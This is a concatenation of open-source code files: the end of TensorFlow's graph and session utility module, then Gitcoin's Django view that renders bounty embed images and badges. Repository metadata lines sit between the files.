self._gradient_override_map[op_type] except KeyError: pass self._gradient_override_map[op_type] = mapped_op_type try: yield # The code within the context runs here. finally: # Remove the labels set for this context, and restore any saved labels. for op_type, mapped_op_type in op_type_map.items(): try: self._gradient_override_map[op_type] = saved_mappings[op_type] except KeyError: del self._gradient_override_map[op_type] # pylint: enable=g-doc-return-or-yield def prevent_feeding(self, tensor): """Marks the given `tensor` as unfeedable in this graph.""" self._unfeedable_tensors.add(tensor) def is_feedable(self, tensor): """Returns `True` if and only if `tensor` is feedable.""" return tensor not in self._unfeedable_tensors def prevent_fetching(self, op): """Marks the given `op` as unfetchable in this graph.""" self._unfetchable_ops.add(op) def is_fetchable(self, tensor_or_op): """Returns `True` if and only if `tensor_or_op` is fetchable.""" if isinstance(tensor_or_op, Tensor): return tensor_or_op.op not in self._unfetchable_ops else: return tensor_or_op not in self._unfetchable_ops # TODO(agarwal): currently device directives in an outer eager scope will not # apply to inner graph mode code. Fix that. def device(device_name_or_function): """Wrapper for `Graph.device()` using the default graph. See @{tf.Graph.device} for more details. Args: device_name_or_function: The device name or function to use in the context. Returns: A context manager that specifies the default device to use for newly created ops. Raises: RuntimeError: If eager execution is enabled and a function is passed in. """ if context.in_graph_mode(): return get_default_graph().device(device_name_or_function) else: # TODO(agarwal): support device functions in EAGER mode. if callable(device_name_or_function): raise RuntimeError( "tf.device does not support functions when eager execution " "is enabled.") return context.device(device_name_or_function) def container(container_name): """Wrapper for `Graph.container()` using the default graph. Args: container_name: The container string to use in the context. Returns: A context manager that specifies the default container to use for newly created stateful ops. """ return get_default_graph().container(container_name) def colocate_with(op, ignore_existing=False): if context.in_graph_mode(): return get_default_graph().colocate_with(op, ignore_existing) else: if op is not None: return device(op.device) else: return _NullContextmanager() def control_dependencies(control_inputs): """Wrapper for `Graph.control_dependencies()` using the default graph. See @{tf.Graph.control_dependencies} for more details. Args: control_inputs: A list of `Operation` or `Tensor` objects which must be executed or computed before running the operations defined in the context. Can also be `None` to clear the control dependencies. Returns: A context manager that specifies control dependencies for all operations constructed within the context. """ if context.in_graph_mode(): return get_default_graph().control_dependencies(control_inputs) else: return _NullContextmanager() class _DefaultStack(threading.local): """A thread-local stack of objects for providing implicit defaults.""" def __init__(self): super(_DefaultStack, self).__init__() self._enforce_nesting = True self.stack = [] def get_default(self): return self.stack[-1] if len(self.stack) >= 1 else None def reset(self): self.stack = [] def is_cleared(self): return not self.stack @property def enforce_nesting(self): return self._enforce_nesting @enforce_nesting.setter def enforce_nesting(self, value): self._enforce_nesting = value @tf_contextlib.contextmanager def get_controller(self, default): """A context manager for manipulating a default stack.""" try: self.stack.append(default) yield default finally: # stack may be empty if reset() was called if self.stack: if self._enforce_nesting: if self.stack[-1] is not default: raise AssertionError( "Nesting violated for default stack of %s objects" % type(default)) self.stack.pop() else: self.stack.remove(default) _default_session_stack = _DefaultStack() # pylint: disable=protected-access def default_session(session): """Python "with" handler for defining a default session. This function provides a means of registering a session for handling Tensor.eval() and Operation.run() calls. It is primarily intended for use by session.Session, but can be used with any object that implements the Session.run() interface. Use with the "with" keyword to specify that Tensor.eval() and Operation.run() invocations within the scope of a block should be executed by a particular session. The default session applies to the current thread only, so it is always possible to inspect the call stack and determine the scope of a default session. If you create a new thread, and wish to use the default session in that thread, you must explicitly add a "with ops.default_session(sess):" block in that thread's function. Example: The following code examples are equivalent: # 1. Using the Session object directly: sess = ... c = tf.constant(5.0) sess.run(c) # 2. Using default_session(): sess = ... with ops.default_session(sess): c = tf.constant(5.0) result = c.eval() # 3. Overriding default_session(): sess = ... with ops.default_session(sess): c = tf.constant(5.0) with ops.default_session(...): c.eval(session=sess) Args: session: The session to be installed as the default session. Returns: A context manager for the default session. """ return _default_session_stack.get_controller(session) def get_default_session(): """Returns the default session for the current thread. The returned `Session` will be the innermost session on which a `Session` or `Session.as_default()` context has been entered. NOTE: The default session is a property of the current thread. If you create a new thread, and wish to use the default session in that thread, you must explicitly add a `with sess.as_default():` in that thread's function. Returns: The default `Session` being used in the current thread. """ return _default_session_stack.get_default() def _eval_using_default_session(tensors, feed_dict, graph, session=None): """Uses the default session to evaluate one or more tensors. Args: tensors: A single Tensor, or a list of Tensor objects. feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists, numpy ndarrays, TensorProtos, or strings. graph: The graph in which the tensors are defined. session: (Optional) A different session to use to evaluate "tensors". Returns: Either a single numpy ndarray if "tensors" is a single tensor; or a list of numpy ndarrays that each correspond to the respective element in "tensors". Raises: ValueError: If no default session is available; the default session does not have "graph" as its graph; or if "session" is specified, and it does not have "graph" as its graph. """ if session is None: session = get_default_session() if session is None: raise ValueError("Cannot evaluate tensor using `eval()`: No default " "session is registered. Use `with " "sess.as_default()` or pass an explicit session to " "`eval(session=sess)`") if session.graph is not graph: raise ValueError("Cannot use the default session to evaluate tensor: " "the tensor's graph is different from the session's " "graph. Pass an explicit session to " "`eval(session=sess)`.") else: if session.graph is not graph: raise ValueError("Cannot use the given session to evaluate tensor: " "the tensor's graph is different from the session's " "graph.") return session.run(tensors, feed_dict) def _run_using_default_session(operation, feed_dict, graph, session=None): """Uses the default session to run "operation". Args: operation: The Operation to be run. feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists, numpy ndarrays, TensorProtos, or strings. graph: The graph in which "operation" is defined. session: (Optional) A different session to use to run "operation". Raises: ValueError: If no default session is available; the default session does not have "graph" as its graph; or if "session" is specified, and it does not have "graph" as its graph. """ if session is None: session = get_default_session() if session is None: raise ValueError("Cannot execute operation using `run()`: No default " "session is registered. Use `with " "sess.as_default():` or pass an explicit session to " "`run(session=sess)`") if session.graph is not graph: raise ValueError("Cannot use the default session to execute operation: " "the operation's graph is different from the " "session's graph. Pass an explicit session to " "run(session=sess).") else: if session.graph is not graph: raise ValueError("Cannot use the given session to execute operation: " "the operation's graph is different from the session's " "graph.") session.run(operation, feed_dict) class _DefaultGraphStack(_DefaultStack): # pylint: disable=protected-access """A thread-local stack of objects for providing an implicit default graph.""" def __init__(self): super(_DefaultGraphStack, self).__init__() self._global_default_graph = None def get_default(self): """Override that returns a global default if the stack is empty.""" ret = super(_DefaultGraphStack, self).get_default() if ret is None: ret = self._GetGlobalDefaultGraph() return ret def _GetGlobalDefaultGraph(self): if self._global_default_graph is None: # TODO(mrry): Perhaps log that the default graph is being used, or set # provide some other feedback to prevent confusion when a mixture of # the global default graph and an explicit graph are combined in the # same process. self._global_default_graph = Graph() return self._global_default_graph def reset(self): super(_DefaultGraphStack, self).reset() self._global_default_graph = None _default_graph_stack = _DefaultGraphStack() def enable_eager_execution(config=None, device_policy=None): """Enables, for the rest of the lifetime of this program, eager execution. If not called immediately on startup risks creating breakage and bugs. Example: ```python tfe.enable_eager_execution() # After eager execution is enabled, operations are executed as they are # defined and `Tensor`s hold concrete values, which can be accessed as # `numpy.ndarray`s through the `numpy()` method. assert tf.multiply(6, 7).numpy() == 42 ``` Args: config: (Optional.) A `ConfigProto` protocol buffer with configuration options for the Context. Note that a lot of these options may be currently unimplemented or irrelevant when eager execution is enabled. device_policy: (Optional.) What policy to use when trying to run an operation on a device with inputs which are not on that device. Valid values: tfe.DEVICE_PLACEMENT_EXPLICIT: raises an error if the placement is not correct. tfe.DEVICE_PLACEMENT_WARN: copies the tensors which are not on the right device but raises a warning. tfe.DEVICE_PLACEMENT_SILENT: silently copies the tensors. This might hide performance problems. Raises: ValueError: If trying to create a context after using graph operations or if trying to create a context with nontrivial options which differ from those of the existing context. """ # pylint: disable=protected-access if context._default_mode == context.GRAPH_MODE: graph_mode_has_been_used = ( _default_session_stack.stack or _default_graph_stack._global_default_graph is not None) if graph_mode_has_been_used: raise ValueError( "tfe.enable_eager_execution has to be called at program startup.") context._default_mode = context.EAGER_MODE if context._context is None: context._context = context.Context(config=config, device_policy=device_policy) elif ((config is not None and config is not context._context._config) or (device_policy is not None and device_policy is not context._context._device_policy)): raise ValueError("Trying to change the options of an active eager" " execution. Context config: %s, specified config:" " %s. Context device policy: %s; specified device" " policy: %s." % (config, context._context._config, device_policy, context._context._device_policy)) def eager_run(main=None, argv=None): """Runs the program with an optional main function and argv list. The program will run with eager execution enabled. Example: ```python import tensorflow as tf # Import subject to future changes: from tensorflow.contrib.eager.python import tfe def main(_): u = tf.constant(6.0) v = tf.constant(7.0) print(u * v) if __name__ == "__main__": tfe.run() ``` Args: main: the main function to run. argv: the arguments to pass to it. """ enable_eager_execution() app.run(main, argv) def reset_default_graph(): """Clears the default graph stack and resets the global default graph. NOTE: The default graph is a property of the current thread. This function applies only to the current thread. Calling this function while a `tf.Session` or `tf.InteractiveSession` is active will result in undefined behavior. Using any previously created `tf.Operation` or `tf.Tensor` objects after calling this function will result in undefined behavior. Raises: AssertionError: If this function is called within a nested graph. """ if not _default_graph_stack.is_cleared(): raise AssertionError("Do not use tf.reset_default_graph() to clear " "nested graphs. If you need a cleared graph, " "exit the nesting and create a new graph.") _default_graph_stack.reset() def get_default_graph(): """Returns the default graph for the current thread. The returned graph will be the innermost graph on which a `Graph.as_default()` context has been entered, or a global default graph if none has been explicitly created. NOTE: The default graph is a property of the current thread. If you create a new thread, and wish to use the default graph in that thread, you must explicitly add a `with g.as_default():` in that thread's function. Returns: The default `Graph` being used in the current thread. """ return _default_graph_stack.get_default() def get_name_scope(): """Returns the current name scope in the default_graph. For example: ```python with tf.name_scope('scope1'): with tf.name_scope('scope2'): print(tf.get_name_scope()) ``` would print the string `scope1/scope2`. Returns: A string representing the current name scope. """ return get_default_graph().get_name_scope() def _assert_same_graph(original_item, item): """Fail if the 2 items are from different graphs. Args: original_item: Original item to check against. item: Item to check. Raises: ValueError: if graphs do not match. """ if original_item.graph is not item.graph: raise ValueError("%s must be from the same graph as %s." % (item, original_item)) def _get_graph_from_inputs(op_input_list, graph=None): """Returns the appropriate graph to use for the given inputs. This library method provides a consistent algorithm for choosing the graph in which an Operation should be constructed: 1. If the default graph is being used to construct a function, we use the default graph. 2. If the "graph" is specified explicitly, we validate that all of the inputs in "op_input_list" are compatible with that graph. 3. Otherwise, we attempt to select a graph from the first Operation- or Tensor-valued input in "op_input_list", and validate that all other such inputs are in the same graph. 4. If the graph was not specified and it could not be inferred from "op_input_list", we attempt to use the default graph. Args: op_input_list: A list of inputs to an operation, which may include `Tensor`, `Operation`, and other objects that may be converted to a graph element. graph: (Optional) The explicit graph to use. Raises: TypeError: If op_input_list is not a list or tuple, or if graph is not a Graph. ValueError: If a graph is explicitly passed and not all inputs are from it, or if the inputs are from multiple graphs, or we could not find a graph and there was no default graph. Returns: The appropriate graph to use for the given inputs. """ if get_default_graph().building_function: return get_default_graph() op_input_list = tuple(op_input_list) # Handle generators correctly if graph and not isinstance(graph, Graph): raise TypeError("Input graph needs to be a Graph: %s" % graph) # 1. We validate that all of the inputs are from the same graph. This is # either the supplied graph parameter, or the first one selected from one # the graph-element-valued inputs. In the latter case, we hold onto # that input in original_graph_element so we can provide a more # informative error if a mismatch is found. original_graph_element = None for op_input in op_input_list: # Determine if this is a valid graph_element. # TODO(josh11b): Note that we exclude subclasses of Tensor. Need to clean this # up. graph_element = None if (isinstance(op_input, (Operation, _TensorLike)) and ((not isinstance(op_input, Tensor)) or type(op_input) == Tensor)): # pylint: disable=unidiomatic-typecheck graph_element = op_input else: graph_element = _as_graph_element(op_input) if graph_element is not None: if not graph: original_graph_element = graph_element graph = graph_element.graph elif original_graph_element is not None: _assert_same_graph(original_graph_element, graph_element) elif graph_element.graph is not graph: raise ValueError("%s is not from the passed-in graph." % graph_element) # 2. If all else fails, we use the default graph, which is always there. return graph or get_default_graph() class GraphKeys(object): """Standard names to use for graph collections. The standard library uses various well-known names to collect and retrieve values associated with a graph. For example, the `tf.Optimizer` subclasses default to optimizing the variables collected under `tf.GraphKeys.TRAINABLE_VARIABLES` if none is specified, but it is also possible to pass an explicit list of variables. The following standard keys are defined: * `GLOBAL_VARIABLES`: the default collection of `Variable` objects, shared across distributed environment (model variables are subset of these). See @{tf.global_variables} for more details. Commonly, all `TRAINABLE_VARIABLES` variables will be in `MODEL_VARIABLES`, and all `MODEL_VARIABLES` variables will be in `GLOBAL_VARIABLES`. * `LOCAL_VARIABLES`: the subset of `Variable` objects that are local to each machine. Usually used for temporarily variables, like counters. Note: use `tf.contrib.framework.local_variable` to add to this collection. * `MODEL_VARIABLES`: the subset of `Variable` objects that are used in the model for inference (feed forward). Note: use `tf.contrib.framework.model_variable` to add to this collection. * `TRAINABLE_VARIABLES`: the subset of `Variable` objects that will be trained by an optimizer. See @{tf.trainable_variables} for more details. * `SUMMARIES`: the summary `Tensor` objects that have been created in the graph. See @{tf.summary.merge_all} for more details. * `QUEUE_RUNNERS`: the `QueueRunner` objects that are used to produce input for a computation. See @{tf.train.start_queue_runners} for more details. * `MOVING_AVERAGE_VARIABLES`: the subset of `Variable` objects that will also keep moving averages. See @{tf.moving_average_variables} for more details. * `REGULARIZATION_LOSSES`: regularization losses collected during graph construction. The following standard keys are _defined_, but their collections are **not** automatically populated as many of the others are: * `WEIGHTS` * `BIASES` * `ACTIVATIONS` """ # Key to collect Variable objects that are global (shared across machines). # Default collection for all variables, except local ones. GLOBAL_VARIABLES = "variables" # Key to collect local variables that are local to the machine and are not # saved/restored. LOCAL_VARIABLES = "local_variables" # Key to collect local variables which are used to accumulate interal state # to be used in tf.metrics.*. METRIC_VARIABLES = "metric_variables" # Key to collect model variables defined by layers. MODEL_VARIABLES = "model_variables" # Key to collect Variable objects that will be trained by the # optimizers. TRAINABLE_VARIABLES = "trainable_variables" # Key to collect summaries. SUMMARIES = "summaries" # Key to collect QueueRunners. QUEUE_RUNNERS = "queue_runners" # Key to collect table initializers. TABLE_INITIALIZERS = "table_initializer" # Key to collect asset filepaths. An asset represents an external resource # like a vocabulary file. ASSET_FILEPATHS = "asset_filepaths" # Key to collect Variable objects that keep moving averages. MOVING_AVERAGE_VARIABLES = "moving_average_variables" # Key to collect regularization losses at graph construction. REGULARIZATION_LOSSES = "regularization_losses" # Key to collect concatenated sharded variables. CONCATENATED_VARIABLES = "concatenated_variables" # Key to collect savers. SAVERS = "savers" # Key to collect weights WEIGHTS = "weights" # Key to collect biases BIASES = "biases" # Key to collect activations ACTIVATIONS = "activations" # Key to collect update_ops UPDATE_OPS = "update_ops" # Key to collect losses LOSSES = "losses" # Key to collect BaseSaverBuilder.SaveableObject instances for checkpointing. SAVEABLE_OBJECTS = "saveable_objects" # Key to collect all shared resources used by the graph which need to be # initialized once per cluster. RESOURCES = "resources" # Key to collect all shared resources used in this graph which need to be # initialized once per session. LOCAL_RESOURCES = "local_resources" # Trainable resource-style variables. TRAINABLE_RESOURCE_VARIABLES = "trainable_resource_variables" # Key to indicate various ops. INIT_OP = "init_op" LOCAL_INIT_OP = "local_init_op" READY_OP = "ready_op" READY_FOR_LOCAL_INIT_OP = "ready_for_local_init_op" SUMMARY_OP = "summary_op" GLOBAL_STEP = "global_step" # Used to count the number of evaluations performed during a single evaluation # run. EVAL_STEP = "eval_step" TRAIN_OP = "train_op" # Key for control flow context. COND_CONTEXT = "cond_context" WHILE_CONTEXT = "while_context" # List of all collections that keep track of variables. _VARIABLE_COLLECTIONS = [ GLOBAL_VARIABLES, LOCAL_VARIABLES, METRIC_VARIABLES, MODEL_VARIABLES, TRAINABLE_VARIABLES, MOVING_AVERAGE_VARIABLES, CONCATENATED_VARIABLES, TRAINABLE_RESOURCE_VARIABLES, ] # Key for streaming model ports. # NOTE(yuanbyu): internal and experimental. _STREAMING_MODEL_PORTS = "streaming_model_ports" @decorator_utils.classproperty def VARIABLES(cls): # pylint: disable=no-self-argument logging.log_first_n(logging.WARN, "VARIABLES collection name is deprecated, please use " "GLOBAL_VARIABLES instead; VARIABLES will be removed " "after 2017-03-02.", 1) return cls.GLOBAL_VARIABLES def add_to_collection(name, value): """Wrapper for `Graph.add_to_collection()` using the default graph. See @{tf.Graph.add_to_collection} for more details. Args: name: The key for the collection. For example, the `GraphKeys` class contains many standard names for collections. value: The value to add to the collection. @compatibility(eager) Collections are not supported when eager execution is enabled. @end_compatibility """ get_default_graph().add_to_collection(name, value) def add_to_collections(names, value): """Wrapper for `Graph.add_to_collections()` using the default graph. See @{tf.Graph.add_to_collections} for more details. Args: names: The key for the collections. The `GraphKeys` class contains many standard names for collections. value: The value to add to the collections. @compatibility(eager) Collections are not supported when eager execution is enabled. @end_compatibility """ get_default_graph().add_to_collections(names, value) def get_collection_ref(key): """Wrapper for `Graph.get_collection_ref()` using the default graph. See @{tf.Graph.get_collection_ref} for more details. Args: key: The key for the collection. For example, the `GraphKeys` class contains many standard names for collections. Returns: The list of values in the collection with the given `name`, or an empty list if no value has been added to that collection. Note that this returns the collection list itself, which can be modified in place to change the collection. @compatibility(eager) Collections are not supported when eager execution is enabled. @end_compatibility """ return get_default_graph().get_collection_ref(key) def get_collection(key, scope=None): """Wrapper for `Graph.get_collection()` using the default graph. See @{tf.Graph.get_collection} for more details. Args: key: The key for the collection. For example, the `GraphKeys` class contains many standard names for collections. scope: (Optional.) If supplied, the resulting list is filtered to include only items whose `name` attribute matches using `re.match`. Items without a `name` attribute are never returned if a scope is supplied and the choice or `re.match` means that a `scope` without special tokens filters by prefix. Returns: The list of values in the collection with the given `name`, or an empty list if no value has been added to that collection. The list contains the values in the order under which they were collected. @compatibility(eager) Collections are not supported when eager execution is enabled. @end_compatibility """ return get_default_graph().get_collection(key, scope) def get_all_collection_keys(): """Returns a list of collections used in the default graph.""" return get_default_graph().get_all_collection_keys() # Named like a function for backwards compatibility with the # @tf_contextlib.contextmanager version, which was switched to a class to avoid # some object creation overhead. class name_scope(object): # pylint: disable=invalid-name """A context manager for use when defining a Python op. This context manager validates that the given `values` are from the same graph, makes that graph the default graph, and pushes a name scope in that graph (see @{tf.Graph.name_scope} for more details on that). For example, to define a new Python op called `my_op`: ```python def my_op(a, b, c, name=None): with tf.name_scope(name, "MyOp", [a, b, c]) as scope: a = tf.convert_to_tensor(a, name="a") b = tf.convert_to_tensor(b, name="b") c = tf.convert_to_tensor(c, name="c") # Define some computation that uses `a`, `b`, and `c`. return foo_op(..., name=scope) ``` """ @property def name(self): return self._name def __init__(self, name, default_name=None, values=None): """Initialize the context manager. Args: name: The name argument that is passed to the op function. default_name: The default name to use if the `name` argument is `None`. values: The list of `Tensor` arguments that are passed to the op function. """ self._name = default_name if name is None else name self._default_name = default_name self._values = values self._ctx = context.context() self._in_eager_mode = self._ctx.in_eager_mode() def __enter__(self): """Start the scope block. Returns: The scope name. Raises: ValueError: if neither `name` nor `default_name` is provided but `values` are. """ if self._in_eager_mode: self._old_name = self._ctx.scope_name if self._name: scope_name = (self._old_name + self._name + "/" if self._old_name else self._name + "/") else: scope_name = "" self._ctx.scope_name = scope_name return scope_name else: if self._name is None and self._values is not None: # We only raise an error if values is not None (provided) because # currently tf.name_scope(None) (values=None then) is sometimes used as # an idiom to reset to top scope. raise ValueError( "At least one of name (%s) and default_name (%s) must be provided." % (self._name, self._default_name)) if self._values is None: self._values = [] g = _get_graph_from_inputs(self._values) self._g_manager = g.as_default() self._g_manager.__enter__() self._name_scope = g.name_scope(self._name) return self._name_scope.__enter__() def __exit__(self, type_arg, value_arg, traceback_arg): if self._in_eager_mode: self._ctx.scope_name = self._old_name else: self._name_scope.__exit__(type_arg, value_arg, traceback_arg) self._g_manager.__exit__(type_arg, value_arg, traceback_arg) return False # False values do not suppress exceptions def strip_name_scope(name, export_scope): """Removes name scope from a name. Args: name: A `string` name. export_scope: Optional `string`. Name scope to remove. Returns: Name with name scope removed, or the original name if export_scope is None. """ if export_scope: try: # Strips export_scope/, export_scope///, # ^export_scope/, loc:@export_scope/. str_to_replace = r"([\^]|loc:@|^)" + export_scope + r"[\/]+(.*)" return re.sub(str_to_replace, r"\1\2", compat.as_str(name), count=1) except TypeError as e: # If the name is not of a type we can process, simply return it. logging.warning(e) return name else: return name def prepend_name_scope(name, import_scope): """Prepends name scope to a name. Args: name: A `string` name. import_scope: Optional `string`. Name scope to add. Returns: Name with name scope added, or the original name if import_scope is None. """ if import_scope: try: str_to_replace = r"([\^]|loc:@|^)(.*)" return re.sub(str_to_replace, r"\1" + import_scope + r"/\2", compat.as_str(name)) except TypeError as e: # If the name is not of a type we can process, simply return it. logging.warning(e) return name else: return name # pylint: disable=g-doc-return-or-yield # pylint: disable=not-context-manager @tf_contextlib.contextmanager def op_scope(values, name, default_name=None): """DEPRECATED. Same as name_scope above, just different argument order.""" logging.warn("tf.op_scope(values, name, default_name) is deprecated," " use tf.name_scope(name, default_name, values)") with name_scope(name, default_name=default_name, values=values) as scope: yield scope _proto_function_registry = registry.Registry("proto functions") def register_proto_function(collection_name, proto_type=None, to_proto=None, from_proto=None): """Registers `to_proto` and `from_proto` functions for collection_name. `to_proto` function converts a Python object to the corresponding protocol buffer, and returns the protocol buffer. `from_proto` function converts protocol buffer into a Python object, and returns the object.. Args: collection_name: Name of the collection. proto_type: Protobuf type, such as `saver_pb2.SaverDef`, `variable_pb2.VariableDef`, `queue_runner_pb2.QueueRunnerDef`.. to_proto: Function that implements Python object to protobuf conversion. from_proto: Function that implements protobuf to Python object conversion. """ if to_proto and not callable(to_proto): raise TypeError("to_proto must be callable.") if from_proto and not callable(from_proto): raise TypeError("from_proto must be callable.") _proto_function_registry.register((proto_type, to_proto, from_proto), collection_name) def get_collection_proto_type(collection_name): """Returns the proto_type for collection_name.""" try: return _proto_function_registry.lookup(collection_name)[0] except LookupError: return None def get_to_proto_function(collection_name): """Returns the to_proto function for collection_name.""" try: return _proto_function_registry.lookup(collection_name)[1] except LookupError: return None def get_from_proto_function(collection_name): """Returns the from_proto function for collection_name.""" try: return _proto_function_registry.lookup(collection_name)[2] except LookupError: return None def _assert_collection_is_ok(collection_name): if context.in_eager_mode(): if collection_name in GraphKeys._VARIABLE_COLLECTIONS: # pylint: disable=protected-access raise ValueError("When Eager Execution is enabled, variable " "collections are not supported.") def _operation_conversion_error(op, dtype=None, name=None, as_ref=False): """Produce a nice error if someone converts an Operation to a Tensor.""" raise TypeError(("Can't convert Operation '%s' to Tensor " "(target dtype=%r, name=%r, as_ref=%r)") % (op.name, dtype, name, as_ref)) register_tensor_conversion_function(Operation, _operation_conversion_error)
apache-2.0
gitcoinco/web
app/dashboard/embed.py
1
10901
from django.http import HttpResponse, JsonResponse from django.template import loader from django.utils import timezone from django.utils.cache import patch_response_headers import requests from dashboard.models import Bounty from git.utils import get_user, org_name from PIL import Image, ImageDraw, ImageFont from ratelimit.decorators import ratelimit AVATAR_BASE = 'assets/other/avatars/' def wrap_text(text, w=30): new_text = "" new_sentence = "" for word in text.split(" "): delim = " " if new_sentence != "" else "" new_sentence = new_sentence + delim + word if len(new_sentence) > w: new_text += "\n" + new_sentence new_sentence = "" new_text += "\n" + new_sentence return new_text def summarize_bounties(bounties): val_usdt = sum(bounties.values_list('_val_usd_db', flat=True)) if val_usdt < 1: return False, "" currency_to_value = {bounty.token_name: 0.00 for bounty in bounties} for bounty in bounties: currency_to_value[bounty.token_name] += float(bounty.value_true) other_values = ", ".join([ f"{round(value, 2)} {token_name}" for token_name, value in currency_to_value.items() ]) is_plural = 's' if bounties.count() > 1 else '' return True, f"Total: {bounties.count()} issue{is_plural}, {val_usdt} USD, {other_values}" @ratelimit(key='ip', rate='50/m', method=ratelimit.UNSAFE, block=True) def stat(request, key): from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas from matplotlib.figure import Figure from matplotlib.dates import DateFormatter from marketing.models import Stat limit = 10 weekly_stats = Stat.objects.filter(key=key).order_by('created_on') # weekly stats only weekly_stats = weekly_stats.filter( created_on__hour=1, created_on__week_day=1 ).filter( created_on__gt=(timezone.now() - timezone.timedelta(weeks=7)) ) daily_stats = Stat.objects.filter(key=key) \ .filter( created_on__gt=(timezone.now() - timezone.timedelta(days=7)) ).order_by('created_on') daily_stats = daily_stats.filter(created_on__hour=1) # daily stats only stats = weekly_stats if weekly_stats.count() < limit else daily_stats fig = Figure(figsize=(1.6, 1.5), dpi=80, facecolor='w', edgecolor='k') ax = fig.add_subplot(111) x = [] y = [] for stat in stats: x.append(stat.created_on) y.append(stat.val) x = x[-1 * limit:] y = y[-1 * limit:] ax.plot_date(x, y, '-') ax.set_axis_off() ax.xaxis.set_major_formatter(DateFormatter('%Y-%m-%d')) if stats.count() > 1: ax.set_title("Usage over time", y=0.9) else: ax.set_title("(Not enough data)", y=0.3) fig.autofmt_xdate() canvas = FigureCanvas(fig) response = HttpResponse(content_type='image/png') canvas.print_png(response) return response @ratelimit(key='ip', rate='50/m', method=ratelimit.UNSAFE, block=True) def embed(request): # default response could_not_find = Image.new('RGBA', (1, 1), (0, 0, 0, 0)) err_response = HttpResponse(content_type="image/jpeg") could_not_find.save(err_response, "JPEG") # Get maxAge GET param if provided, else default on the small side max_age = int(request.GET.get('maxAge', 3600)) # params repo_url = request.GET.get('repo', False) if not repo_url or 'github.com' not in repo_url: return err_response try: badge = request.GET.get('badge', False) if badge: open_bounties = Bounty.objects.current() \ .filter( github_url__startswith=repo_url, network='mainnet', idx_status__in=['open'] ) tmpl = loader.get_template('svg_badge.txt') response = HttpResponse( tmpl.render({'bounties_count': open_bounties.count()}), content_type='image/svg+xml', ) patch_response_headers(response, cache_timeout=max_age) return response # get avatar of repo _org_name = org_name(repo_url) avatar = None filename = f"{_org_name}.png" filepath = 'assets/other/avatars/' + filename try: avatar = Image.open(filepath, 'r').convert("RGBA") except IOError: remote_user = get_user(_org_name) if not remote_user.get('avatar_url', False): return JsonResponse({'msg': 'invalid user'}, status=422) remote_avatar_url = remote_user['avatar_url'] r = requests.get(remote_avatar_url, stream=True) chunk_size = 20000 with open(filepath, 'wb') as fd: for chunk in r.iter_content(chunk_size): fd.write(chunk) avatar = Image.open(filepath, 'r').convert("RGBA") # make transparent datas = avatar.getdata() new_data = [] for item in datas: if item[0] == 255 and item[1] == 255 and item[2] == 255: new_data.append((255, 255, 255, 0)) else: new_data.append(item) avatar.putdata(new_data) avatar.save(filepath, "PNG") # get issues length = request.GET.get('len', 10) super_bounties = Bounty.objects.current() \ .filter( github_url__startswith=repo_url, network='mainnet', idx_status__in=['open', 'started', 'submitted'] ).order_by('-_val_usd_db') bounties = super_bounties[:length] # config bounty_height = 200 bounty_width = 572 font = 'assets/v2/fonts/futura/FuturaStd-Medium.otf' width = 1776 height = 576 # setup img = Image.new("RGBA", (width, height), (255, 255, 255)) draw = ImageDraw.Draw(img) black = (0, 0, 0) gray = (102, 102, 102) h1 = ImageFont.truetype(font, 36, encoding="unic") h2_thin = ImageFont.truetype(font, 36, encoding="unic") p = ImageFont.truetype(font, 24, encoding="unic") # background background_image = 'assets/v2/images/embed-widget/background.png' back = Image.open(background_image, 'r').convert("RGBA") offset = 0, 0 img.paste(back, offset) # repo logo icon_size = (184, 184) avatar.thumbnail(icon_size, Image.ANTIALIAS) offset = 195, 148 img.paste(avatar, offset, avatar) img_org_name = ImageDraw.Draw(img) img_org_name_size = img_org_name.textsize(_org_name, h1) img_org_name.multiline_text( align="left", xy=(287 - img_org_name_size[0] / 2, 360), text=_org_name, fill=black, font=h1, ) draw.multiline_text( align="left", xy=(110, 410), text="supports funded issues", fill=black, font=h1, ) # put bounty list in there i = 0 for bounty in bounties[:4]: i += 1 # execute line_size = 2 # Limit text to 28 chars text = f"{bounty.title_or_desc}" text = (text[:28] + '...') if len(text) > 28 else text x = 620 + (int((i-1)/line_size) * (bounty_width)) y = 230 + (abs(i % line_size-1) * bounty_height) draw.multiline_text(align="left", xy=(x, y), text=text, fill=black, font=h2_thin) unit = 'day' num = int(round((bounty.expires_date - timezone.now()).days, 0)) if num == 0: unit = 'hour' num = int(round((bounty.expires_date - timezone.now()).seconds / 3600 / 24, 0)) unit = unit + ("s" if num != 1 else "") draw.multiline_text( align="left", xy=(x, y - 40), text=f"Expires in {num} {unit}:", fill=gray, font=p, ) bounty_eth_background = Image.new("RGBA", (200, 56), (231, 240, 250)) bounty_usd_background = Image.new("RGBA", (200, 56), (214, 251, 235)) img.paste(bounty_eth_background, (x, y + 50)) img.paste(bounty_usd_background, (x + 210, y + 50)) tmp = ImageDraw.Draw(img) bounty_value_size = tmp.textsize(f"{round(bounty.value_true, 2)} {bounty.token_name}", p) draw.multiline_text( align="left", xy=(x + 100 - bounty_value_size[0]/2, y + 67), text=f"{round(bounty.value_true, 2)} {bounty.token_name}", fill=(44, 35, 169), font=p, ) bounty_value_size = tmp.textsize(f"{round(bounty.value_in_usdt_now, 2)} USD", p) draw.multiline_text( align="left", xy=(x + 310 - bounty_value_size[0]/2, y + 67), text=f"{round(bounty.value_in_usdt_now, 2)} USD", fill=(45, 168, 116), font=p, ) # blank slate if bounties.count() == 0: draw.multiline_text( align="left", xy=(760, 320), text="No active issues. Post a funded issue at: https://gitcoin.co", fill=gray, font=h1, ) if bounties.count() != 0: text = 'Browse issues at: https://gitcoin.co/explorer' draw.multiline_text( align="left", xy=(64, height - 70), text=text, fill=gray, font=p, ) draw.multiline_text( align="left", xy=(624, 120), text="Recently funded issues:", fill=(62, 36, 251), font=p, ) _, value = summarize_bounties(super_bounties) value_size = tmp.textsize(value, p) draw.multiline_text( align="left", xy=(1725 - value_size[0], 120), text=value, fill=gray, font=p, ) line_table_header = Image.new("RGBA", (1100, 6), (62, 36, 251)) img.paste(line_table_header, (624, 155)) # Resize back to output size for better anti-alias img = img.resize((888, 288), Image.LANCZOS) # Return image with right content-type response = HttpResponse(content_type="image/png") img.save(response, "PNG") patch_response_headers(response, cache_timeout=max_age) return response except IOError as e: print(e) return err_response
agpl-3.0
blademainer/intellij-community
python/helpers/epydoc/docwriter/html.py
89
143938
